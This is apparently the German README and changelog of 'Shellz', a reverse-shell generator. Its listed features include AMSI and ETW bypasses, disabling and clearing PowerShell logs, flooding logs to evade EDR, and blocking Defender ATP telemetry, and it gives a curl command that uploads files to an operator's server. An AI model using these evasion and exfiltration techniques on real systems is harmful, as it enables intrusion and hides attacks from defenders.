Shellz
Ein Skript zur schnellen und einfachen Generierung gängiger Revshells.
Besonders nützlich, wenn man PowerShell- und Python-Revshells benötigt, die oft mühsam korrekt zu formatieren sind.
PowerShell revshells
- Zeigt username@computer.(domain) oberhalb der Eingabeaufforderung und das Arbeitsverzeichnis an
- Verfügt über einen partiellen und vollständigen AMSI-Bypass.
- TCP-, UDP- und SSL-Shells
- Neue benutzerdefinierte TCP-Revshell!
- Neue benutzerdefinierte SSL-Revshell!
- Reflektives Laden von theart42's erstaunlichem Sharpcat!
- Windows PowerShell und Core PowerShell
- Funktionen zum Hoch- und Herunterladen von Dateien. (Verwendet Updog von sc0tfree)
Python
- Kein PowerShell? Kein Problem!
Eingebettetes Python laden. Signierte Dateien, vertrauenswürdig von Microsoft Intelligent Security Graph.
ngrok support
- ngrok kann innerhalb des Skripts gestartet/gestoppt werden
- Payloads werden mit den ngrok-Adressen generiert
Updog support
- Du kannst Updog innerhalb des Skripts starten/stoppen
- Die PowerShell-Revshells haben eine eingebaute Upload/Download-Funktion
- So lädst du von nix mit curl hoch:
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
So installierst du Shells von git
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
So installierst du shells auf BlackArch:
Screenshots

Erforderliche Abhängigkeiten
netcat, rlwrap, jq, basenc (coreutils)
Optionale Abhängigkeiten
updog, ngrok, xclip
YouTube-Video
Shellz 1.7.5
Version 1.7.7
- Option „Windows Terminal Init“ im PowerShell-Bereich hinzugefügt
Version 1.7.6
- Option unter Python hinzugefügt, um Python Embedded in einem VBA-Makro zu verwenden
Version 1.7.5
- Option unter PowerShell hinzugefügt für gestaffeltes Laden eines Constrained Language Mode Bypass mittels msbuild.exe
Version 1.7.4
- Payload für Python Embedded geändert. Skript wird nicht mehr auf die Festplatte geschrieben
- Python-Revshell leicht verschleiert
Version 1.7.3
- Tippfehler im Python3-Payload für Windows korrigiert
- Option hinzugefügt, um Python Embedded zu verwenden, um eine Revshell auf einem Windows-Rechner ohne Python und ohne PowerShell zu erhalten.
Version 1.7.1
- PS zur Eingabeaufforderung in der SSL-Shell hinzugefügt
- Den vollständigen AMSI-Bypass verkürzt
Version 1.7
- Meldung „Updog läuft nicht“ entfernt, wenn es zuvor nicht aktiviert wurde
- Einige weitere Auto-Enter-Auswahlen in Menüs entfernt
Version 1.6.9
- Fehler im Block-MDE-Befehl behoben
- Init-Befehlsoptionen hinzugefügt: cmd, conhost, powershell (Wenn der Payload länger als 8191 Zeichen ist, muss er direkt über PowerShell gestartet werden)
Version 1.6.8
- „Microsoft-Windows-PowerShell/Operational“ mit noch mehr Einträgen gefüllt, um die anfängliche Skriptausführung sicher zu verdrängen. (Funktioniert nur, wenn Scriptblock-Logging auf dem Ziel aktiviert ist)
Version 1.6.7
- Bisher nur URL-sicheres Base64-Encoding. Normales Base64-Encoding der Payloads hinzugefügt.
Version 1.6.6
- Option zum Füllen des PowerShell-Logs hinzugefügt. Es wird eine Reihe von PowerShell-Sitzungen gestartet, die einen langen String übergeben und beendet werden. Dadurch wird das Log gefüllt, wenn Scriptblock-Logging aktiviert ist, was frühere Log-Einträge effektiv verdrängt und damit das Ereignis der Shell-Erstellung selbst entfernt. Könnte EDR-Erkennung verhindern. Erfolgreich auf SentinelOne getestet.
- Verwirrende Menüauswahl behoben. Auto-Enter bei den meisten Menüs entfernt.
- Metasploit Multi/Handler Listener hinzugefügt
Version 1.6.5
- PowerShell ETW-Patch hinzugefügt
- PowerShell eingebetteter vollständiger AMSI-Bypass hinzugefügt.
- Payload-Längenprüfung hinzugefügt. Die maximale Länge einer Zeichenfolge, die in der Windows-Eingabeaufforderung (cmd.exe) verwendet werden kann, beträgt 8191 Zeichen.
Version 1.6.4
- PowerShell SSL-Shell repariert
Version 1.6.3
- Variable Expansion im PowerShell-Payload hinzugefügt, sodass er z. B. aus Batch-Dateien ohne Änderung ausgeführt werden kann
Version 1.6.2
Version 1.6.1
- Listener in neuem Fenster gestartet. (Optional unter Linux)
Version 1.6
- PowerShell: Option zum reflektiven Laden von Sharpcat hinzugefügt
Version 1.5.9
- PowerShell: Neue benutzerdefinierte SSL-Shell
- PowerShell: Optionen für TCP/UDP/SSL hinzugefügt
- PowerShell/OpenSSL: Standardmäßig korrekter Listener bei Verwendung von SSL
Version 1.5.8
- Installationsskript aktualisiert, um Wrapper-Skript zu verwenden (bei Upgrade von < 1.5.8 /usr/local/bin/shells löschen nicht vergessen)
Version 1.5.7
- PowerShell: Einzigartige TCP-Revshell erstellt, die nicht Net.Sockets.TCPClient verwendet
- PowerShell: Remote-Fehlermeldungen werden jetzt ordnungsgemäß angezeigt
Version 1.5.6
- PHP: Optionen und weitere Payloads hinzugefügt
Version 1.5.5
- Option bei anderen Payloads zum Ändern der Shell hinzugefügt
Version 1.5.4
- PowerShell: NIX-Payload korrigiert
- PowerShell: Payload für reflektives Laden von C# aktualisiert
Version 1.5.3
- PowerShell: Optionen für Payload im Menü hinzugefügt
Version 1.5.2
- PowerShell: Revshell geändert, um mehr AV-Anbieter zu umgehen
- PowerShell: Firewallregel hinzugefügt, die verhindert, dass MS ATP nach Hause telefoniert (wenn der Benutzer die Berechtigung hat)
- PowerShell: VBA (MS Office Macros) aktualisiert
Version 1.5.1
- PowerShell: Scriptblock-Logging und CheckSuspiciousContent deaktiviert
- PowerShell: PowerShell-Ereignisprotokolle gelöscht (wenn der Benutzer die Berechtigung hat)
Version 1.5.0
- PowerShell: VBA-Payloads für MS Office Macros hinzugefügt
- Einige Node.js-Payloads hinzugefügt
Version 1.4.9
- Einfache C#-Shell hinzugefügt.
- Payload zum reflektiven Laden der C#-Shell in den Speicher hinzugefügt (benötigt vollständigen AMSI-Bypass)
- Dafür Rastamouse's vollständigen AMSI-Bypass hinzugefügt
- PowerShell: Möglichkeit, den vollständigen AMSI-Bypass automatisch hochzuladen und auszuführen. Der partielle AMSI-Bypass macht dies möglich.
- C#-Shell: Vor dem Laden in den Speicher wird der vollständige AMSI-Bypass automatisch hochgeladen und ausgeführt.
- Updog- und ngrok-Status werden in jedem Menü angezeigt
Version 1.4.8
- Manchmal ist weniger mehr. Die Verschleierung bei TCP/UDP-PowerShell-Revshells entfernt, da sie AV mehr auslöst als umgeht und der Payload sehr groß wurde :-) Verwende weiterhin Randomisierung.
Version 1.4.6
- Webshells hinzugefügt (ASPX, PHP, JSP)
Version 1.4.5
- 2 C++ Revshell-Binärdateien für Windows 32 und 64 Bit hinzugefügt.
Version 1.4.4
- Behandlung von Starten/Stoppen von Updog behoben
Version 1.4.3
- Updog-Unterstützung hinzugefügt
- Netcat-Binärdateien hinzugefügt.
- PowerShell: Upload/Download-Funktion erstellt (Upload benötigt Updog zum Empfangen von Dateien)
- Weitere Informationen zum Ausführen von ngrok und Updog hinzugefügt.
Version 1.4.2
- PowerShell: Neuen „mini AMSI-Bypass“ hinzugefügt. (Es ist ein partieller Bypass) Basierend auf Matt Graebers Reflection-Methode
- PowerShell: „Upload“-Funktion in der PowerShell-Revshell hinzugefügt
Version 1.4.1
- AMSI entfernt. Nicht ausreichend getestet :-)
Version 1.4
- AMSI-Bypass für die PowerShell-Payloads hinzugefügt
Version 1.3.9
- Fehler beim Setzen des Ports behoben
- Standardport auf 443 geändert
- PowerShell: weitere Verschleierung
Version 1.3.8
- PowerShell: Kleinere Änderungen am UDP-Payload
Version 1.3.7
- Verwende natives nc auf macOS, da das von Homebrew bei eingehendem UDP nicht funktioniert
- PowerShell: UDP-Payloads hinzugefügt
Version 1.3.6
- PowerShell: Weitere Payloads hinzugefügt
Version 1.3.5
- PowerShell: Randomisierung und Verschleierung für den Payload hinzugefügt
Version 1.3.4
- PowerShell: UTF8-Kodierung im Payload verwendet
Version 1.3.3
Version 1.3.2
Version 1.3.1
- Fehler in Python-Revshell behoben
- Awk hinzugefügt
- Bash UDP hinzugefügt
Version 1.3
- Windows-Python-Revshells hinzugefügt
Version 1.2.9
- ngrok-Ausführungsstatus hinzugefügt
Version 1.2.8
- ngrok-Auswahl ausgeblendet, wenn nicht installiert
Version 1.2.7
- Installationsoptionen korrigiert: Keine Standardoption mehr bei Drücken der Eingabetaste ohne Auswahl
Version 1.2.6
- Unterstützung für ngrok hinzugefügt.
Version 1.2.4
- Installationsskript hinzugefügt
- Installationsoptionen zum Prüfen und Installieren fehlender Abhängigkeiten hinzugefügt
Version 1.2.3
- Einige PHP-Shells hinzugefügt
Version 1.2.2
- Shells für: Ruby, Perl, Telnet und zsh hinzugefügt
Version 1.2.1
- Kopieren in die Zwischenablage mit pbcopy auf macOS hinzugefügt
- Informationen zum Horchen auf Netcat hinzugefügt, da die macOS-Versionen diese nicht anzeigen
Version 1.2
- Loop-Netcat-Shells hinzugefügt. Ruft alle 10 Sekunden zurück. Ideal, falls die Shell verloren geht
- Prüfung auf Netcat GNU netcat 0.7.0 Homebrew unter macOS hinzugefügt
Version 1.1
- Unterstützung für macOS hinzugefügt